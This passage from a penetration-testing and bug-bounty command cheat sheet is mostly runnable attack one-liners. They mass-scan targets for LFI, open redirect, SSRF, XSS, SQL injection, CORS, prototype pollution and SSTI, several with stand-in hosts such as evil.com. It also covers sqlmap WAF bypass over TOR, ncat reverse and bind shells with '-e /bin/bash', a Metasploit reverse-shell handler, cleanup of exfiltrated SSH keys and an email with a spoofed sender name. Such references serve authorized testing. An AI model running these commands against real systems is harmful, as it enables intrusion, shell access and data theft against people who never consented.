**[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:" **Open redirect:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n" ;done cat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain' echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew **SSRF:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr **XSS:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** file=$1; key="API_KEY"; while read line; do curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $file cat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep = | qsreplace "" | httpx -silent -nc -mc 200 -mr "" cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe echo target.com | (gau || hakrawler || waybackurls || katana) | grep '=' |qsreplace '">' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "" && echo "$host \033[0;31m" Vulnerable;done cat urls.txt | grep "=" | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht cat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 http://xsstrike.py -u @ --crawl' echo http://testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '">' | freq **Hidden directories:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -e 7z,archive,ashx,asp,aspx,back,backup,backup-sql,backup.db,backup.sql,bak,bak.zip,bakup,bin,bkp,bson,bz2,core,csv,data,dataset,db,db-backup,db-dump,db.7z,db.bz2,db.gz,db.tar,db.tar.gz,db.zip,dbs.bz2,dll,dmp,dump,dump.7z,dump.db,dump.z,dump.zip,exported,gdb,gdb.dump,gz,gzip,ib,ibd,iso,jar,java,json,jsp,jspf,jspx,ldf,log,lz,lz4,lzh,mongo,neo4j,old,pg.dump,phtm,phtml,psql,rar,rb,rdb,rdb.bz2,rdb.gz,rdb.tar,rdb.tar.gz,rdb.zip,redis,save,sde,sdf,snap,sql,sql.7z,sql.bak,sql.bz2,sql.db,sql.dump,sql.gz,sql.lz,sql.rar,sql.tar.gz,sql.tar.z,sql.xz,sql.z,sql.zip,sqlite,sqlite.bz2,sqlite.gz,sqlite.tar,sqlite.tar.gz,sqlite.zip,sqlite3,sqlitedb,swp,tar,tar.bz2,tar.gz,tar.z,temp,tml,vbk,vhd,war,xhtml,xml,xz,z,zip,conf,config,bak,backup,swp,old,db,sql,asp,aspx~,asp~,py,py~,rb~,php,php~,bkp,cache,cgi,inc,js,json,jsp~,lock,wadl -o output.txt ffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json **Search for sensitive files from Wayback** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** echo target.com | (gau || hakrawler || waybackurls || katana) | grep -color -E ".xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt| \\.zip| \\.tar.gz| \\.tgz| \\.bak| \\.7z| \\.rar" **SQLi:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** cat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs && for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 **Bypass WAF using TOR:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor --dbs --random-agent --tamper=space2comment **CORS:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** echo target.com | (gau || hakrawler || waybackurls || katana) | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done **Prototype pollution:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** subfinder -d target.com -all -silent | httpx -silent -threads 100 | anew alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE" **Find JS files:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** cat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i -E "\.js" | egrep -v "\.json|\.jsp" | anew js.txt while read -r url; do if curl -s -o /dev/null -w "%{http_code}" "$url" | grep -q 200 && \ curl -s -I "$url" | grep -iq 'Content-Type:.*\(text/javascript\|application/javascript\)'; then echo "$url" fi done < urls.txt > js.txt **Hidden params in JS:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** cat subs.txt | (gau || hakrawler || waybackurls || katana) | sort -u | httpx -silent -threads 100 | grep -Eiv '(.eot|.jpg|.jpeg|.gif|.css|.tif|.tiff|.png|.ttf|.otf|.woff|.woff2|.ico|.svg|.txt|.pdf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -Eiv '\.js$|([^.]+)\.js|([^.]+)\.js\.[0-9]+$|([^.]+)\.js[0-9]+$|([^.]+)\.js[a-z][A-Z][0-9]+$' | sed 's/.*/&=FUZZ/g'); echo -e "\e[1;33m$url\e[1;32m$vars";done **Extract sensitive end-point in JS:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u **SSTI:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** for url in $(cat targets.txt); do python3 tplmap.py -u $url; print $url; done echo target.com | gau --subs --threads 200 | httpx -silent -mc 200 -nc | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt && ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 **Scan IPs:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** cat my_ips.txt | xargs -L 100 shodan scan submit --wait 0 **Screenshots using Nuclei:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -v SQLmap Tamper Scripts – WAF bypass: **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** sqlmap -u 'http://www.site.com/search.cmd?form_state=1' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent **Shodan CLI:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** shodan search Ssl.cert.subject.CN:"target.com" --fields ip_str | anew ips.txt **Censys CLI:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** censys search "target.com" --index-type hosts | jq -c '.[] | {ip: .ip}' | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' **Download JS files:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ## curl mkdir -p js_files; while IFS= read -r url || [ -n "$url" ]; do filename=$(basename "$url"); echo "Downloading $filename JS..."; curl -sSL "$url" -o "downloaded_js_files/$filename"; done < "$1"; echo "Download complete." ## wget sed -i 's/\r//' js.txt && for i in $(cat js.txt); do wget "$i"; done **Filter only html/xml content-types for XSS:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** cat urls.txt | grep "=" | grep "?" | uro | httpx -ct -silent -nc | grep -i -E "text/html|application/xhtml+xml|application/xml|text/xml|image/svg+xml" | cut -d '[' -f 1 | anew xml_html.txt ## using curl while read -r url; do if curl -s -o /dev/null -w "%{http_code}" "$url" | grep -q 200 && \ curl -s -I "$url" | grep -iq 'Content-Type:.*text/\(html\|xml\)'; then echo "$url" fi done < urls.txt > xml_html.txt **Get favicon hash:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** curl https://favicon-hash.kmsec.uk/api/?url=https://test.com/favicon.ico | jq **Find params using `x8`:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** subdomain -d target.com -silent -all -recursive | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w parameters.txt -o output.txt' **Find reflected parameters for XSS –** [`xss0r`](https://raw.githubusercontent.com/xss0r/xssorRecon/refs/heads/main/reflection.py): **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** python3 reflection.py urls.txt | grep "Reflection found" | awk -F'[?&]' '!seen[$2]++' | tee reflected.txt ## 8. Miscellaneous Here you can find a bunch of random stuff. **[`^ back to top ^`](#overview)** ### 8.1 Useful Websites * [jsonlint.com](https://jsonlint.com) – JSON validator and formatter. * [base64decode.org](https://www.base64decode.org) – Base64 decode and encode. * [urldecoder.org](https://www.urldecoder.org) – URL decode and encode. * [bitly.com](https://bitly.com) – URL shortener. * [pastebin.com](http://pastebin.com/) – pastebin. * [getcreditcardnumbers.com](https://www.getcreditcardnumbers.com) – dummy credit card info. * [offsec.tools](https://offsec.tools/) – collection of penetration testing tools. * [github.com/mthcht/awesome-lists](https://github.com/mthcht/awesome-lists/tree/main) – huge collection of awesome security lists. ### cURL **[`^ back to top ^`](#overview)** Download a file: curl [somesite.com/somefile.txt](https://somesite.com/somefile.txt) -o somefile.txt Upload a file: curl [somesite.com/uploads/](https://somesite.com/uploads/) -T somefile.txt | Option | Description | | --- | --- | | -d | Sends the specified data in a POST request to the HTTP server | | -H | Extra header to include in the request when sending HTTP to a server | | -i | Include the HTTP response headers in the output | | -k | Proceed and operate server connections otherwise considered insecure | | -o | Write to file instead of stdout | | -T | Transfers the specified local file to the remote URL, same as PUT method | | -v | Make the operation more talkative | | -x | Use the specified proxy (protocol://host:port) | | -X | Specifies a custom request method to use when communicating with the HTTP server | ### Ncat **[`^ back to top ^`](#overview)** Server set up a listener: ncat -nvlp 9000 ncat -nvlp 9000 > received_data.txt ncat -nvlp 9000 -e /bin/bash ncat -nvlp 9000 -e /bin/bash --ssl ncat -nvlp 9000 --ssl-cert crt.pem --ssl-key key.pem ncat -nvlp 9000 --keep-open <<< "HTTP/1.1 200 OK\r\n\r\n" Client connect to a remote host: ncat -nv 192.168.8.5 9000 ncat -nv 192.168.8.5 9000 < sent_data.txt ncat -nv 192.168.8.5 9000 -e /bin/bash ncat -nv 192.168.8.5 9000 -e /bin/bash --ssl ncat -nv 192.168.8.5 9000 --ssl-cert crt.pem --ssl-key key.pem Check if connection to a specified TCP port (e.g., port 22 or 23) is possible: for i in {0..255}; do ncat -nv "192.168.8.${i}" 9000 -w 2 -z 2>&1 | grep -Po '(?<=Connected\ to\ )[^\s]+(?=\.)'; done for ip in $(cat ips.txt); do ncat -nv "${ip}" 9000 -w 2 -z 2>&1 | grep -Po '(?<=Connected\ to\ )[^\s]+(?=\.)'; done #### Port Scanner **[`^ back to top ^`](#overview)** One port: nc -nvz 192.168.1.23 80 Port Range: nc -vnz 192.168.1.23 0-1000 #### Send Files **[`^ back to top ^`](#overview)** Server: nc -lvp 1234 > file_name_to_save Client: nc -vn 192.168.1.33 1234 < file_to_send #### Executing Remote Script **[`^ back to top ^`](#overview)** Server: nc -lvp 1234 -e ping.sh Client: nc -vn 192.168.1.33 1234 #### Chat with Encryption **[`^ back to top ^`](#overview)** Server: ncat -nlvp 8000 --ssl Client: ncat -nv 192.168.1.33 8000 #### Banner Grabbing **[`^ back to top ^`](#overview)** Request: nc target port HTTP_Verb path http/version Host: url Response: nc [www.bla.com](https://www.bla.com).br 80 HEAD / HTTP/1.0 Host: [www.bla.com](https://www.bla.com).br #### HTTPS-OpenSSL **[`^ back to top ^`](#overview)** If this site uses https you need to use openssl: openssl s_client -quiet [www.bla.com](https://www.bla.com).br:443 #### Catch Shell **[`^ back to top ^`](#overview)** Open the listener for catch a shell: rlwrap nc -nlvp 4444 # or nc -nlvp 4444 ### multi/handler **[`^ back to top ^`](#overview)** Set up a listener (change the PAYLOAD, LHOST, and LPORT as necessary): msfconsole -q use exploit/multi/handler set PAYLOAD windows/shell_reverse_tcp set LHOST 192.168.8.185 set LPORT 9000 exploit ### ngrok **[`^ back to top ^`](#overview)** Use [ngrok](https://ngrok.com/download) to give your local web server a public address, but do not expose the web server for too long if it is not properly hardened due to security concerns. ### Simple Web-Server **[`^ back to top ^`](#overview)** Python web-server: python3 -m http.server 8081 PHP web-server: php -S 0.0.0.0:8081 ### SSH **[`^ back to top ^`](#overview)** Connect via ssh: ssh -o StrictHostKeyChecking=no -T root@ Create private and public keys with name `test`: ssh-keygen -t rsa -b 4096 -f test Sometimes, exfiltrated SSH keys will cause ugly errors, such as `Load key "id_rsa": error in libcrypto`. This can often be corrected with simple cleanup. dos2unix id_rsa vim --clean id_rsa chmod 400 id_rsa # One line version dos2unix id_rsa; vim --clean -c 'wq' id_rsa; chmod 400 id_rsa Newer versions of SSH might complain about RSA as such. This can be corrected by adding the following to `~/.ssh/config`. HostKeyAlgorithms +ssh-rsa PubkeyAcceptedAlgorithms +ssh-rsa ### swaks **[`^ back to top ^`](#overview)** Send email with [swaks](https://github.com/jetmore/swaks): swaks -f ${MAIL_FROM} -t ${MAIL_TO} -s ${MAIL_SMTP} --auth-user=${MAIL_AUTH} --auth-password=${MAIL_PASS} -tlsc -p ${MAIL_PORT} --body ${EMAIL} --header "Subject: Bruteforce Report" --add-header "Content-Type: text/plain; charset=UTF-8" --h-From: '"Cloud Storage" <'${MAIL_FROM}'>' Send fast test email with [swaks](https://github.com/jetmore/swaks): swaks -f ${MAIL_FROM} -t ${MAIL_TO} -s ${MAIL_SMTP} -auth-user=${MAIL_AUTH} --auth-password=${MAIL_PASS} -tlsc -p ${MAIL_PORT} --body "TEST" --header "Subject: Mail Test" ### xfreerdp **[`^ back to top ^`](#overview)** Simple user enumeration for Windows Target (kerberos based): xfreerdp /v: -sec-nla /u:"" xfreerdp /v:192.168.0.32 -sec-nla /u:"" Login: xfreerdp /u: /g: /p: /v: xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34 ### Additional References **[`^ back to top ^`](#overview)** Credits to the authors! * [book.hacktricks.xyz](https://book.hacktricks.xyz/welcome/readme) * [infosecmatter.com/bug-bounty-tips](https://www.infosecmatter.com/bug-bounty-tips) * [pentestbook.six2dez.com](https://pentestbook.six2dez.com)
标签:代码片段, 命令速查, 安全工具, 实时处理, 密码管理, 插件系统, 渗透测试, 红蓝对抗, 速查表